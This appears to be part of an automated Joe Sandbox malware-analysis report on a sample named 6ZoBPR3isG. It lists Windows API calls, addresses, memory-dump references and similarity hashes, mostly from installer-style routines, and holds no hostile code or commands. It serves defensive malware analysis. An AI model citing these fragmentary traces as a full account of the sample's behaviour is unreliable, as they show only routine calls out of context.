                                                                                                              • String ID:
                                                                                                              • API String ID: 3562171763-0
                                                                                                              • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                              • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                              • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                              • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointerwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 327478801-0
                                                                                                              • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                              • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                              • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                              • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                              APIs
                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                              • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                              • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                              • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                              • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                              APIs
                                                                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040DCCE,0040CED0,004033DE,0040CED0,0040DCCE,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                              • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                              • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(73F9505C,00000004,00000040,73F9504C), ref: 73F929B1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 979e5ffeed49ebfb4a2019cb2d7da0e2993f94398f2bc29dbfa7e046baddff00
                                                                                                              • Instruction ID: 4cd47a556cabf0a038b2e18a0170271fdd0a79276a649d6c7c46387331bc74b4
                                                                                                              • Opcode Fuzzy Hash: 979e5ffeed49ebfb4a2019cb2d7da0e2993f94398f2bc29dbfa7e046baddff00
                                                                                                              • Instruction Fuzzy Hash: 71F0A5F2905282DEE350EF2B88657093FE0B7593C4B27462AE19EE6271E3354045DF95
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                              • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                              • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                              • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                              • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                              • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,73F9123B,?,73F912DF,00000019,73F911BE,-000000A0), ref: 73F91225
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761449716-0
                                                                                                              • Opcode ID: fb9fe296f92352b5c61e1a00658be083359e7b4a4960b5ed12ebb0e4c56a4a87
                                                                                                              • Instruction ID: d44a5fe81393624415e054140ee29c81ac959ffebf2c8106f6e6c6248768d455
                                                                                                              • Opcode Fuzzy Hash: fb9fe296f92352b5c61e1a00658be083359e7b4a4960b5ed12ebb0e4c56a4a87
                                                                                                              • Instruction Fuzzy Hash: 35B012B2E00000DFEE00FB65CC26F343654E700341F154000F60EE01B0C12048008534
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: (7B${
                                                                                                              • API String ID: 590372296-525222780
                                                                                                              • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                              • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                              • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                              • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$A$Call
                                                                                                              • API String ID: 2624150263-413618503
                                                                                                              • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                              • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                              APIs
                                                                                                                • Part of subcall function 73F9121B: GlobalAlloc.KERNELBASE(00000040,?,73F9123B,?,73F912DF,00000019,73F911BE,-000000A0), ref: 73F91225
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73F91C6B
                                                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 73F91CB3
                                                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 73F91CBD
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73F91CD0
                                                                                                              • GlobalFree.KERNEL32(?), ref: 73F91DB2
                                                                                                              • GlobalFree.KERNEL32(?), ref: 73F91DB7
                                                                                                              • GlobalFree.KERNEL32(?), ref: 73F91DBC
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73F91FA6
                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 73F92140
                                                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 73F921B5
                                                                                                              • LoadLibraryW.KERNEL32(00000008), ref: 73F921C6
                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 73F92220
                                                                                                              • lstrlenW.KERNEL32(00000808), ref: 73F9223A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 245916457-0
                                                                                                              • Opcode ID: ed5808789f18b61da79ecbe58c5d675f89753ad1df8c59e3bdd83effaf524e34
                                                                                                              • Instruction ID: fe0e6fcf7834af0e4c7f86dc53ef970405f16bb1e5ce589e2eb631d90e52895f
                                                                                                              • Opcode Fuzzy Hash: ed5808789f18b61da79ecbe58c5d675f89753ad1df8c59e3bdd83effaf524e34
                                                                                                              • Instruction Fuzzy Hash: 4F22BA72D14A0AEFFB26DFA4C9807EEB7F5FB04384F11453AD166E6290D77496808B48
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateInstance
                                                                                                              • String ID:
                                                                                                              • API String ID: 542301482-0
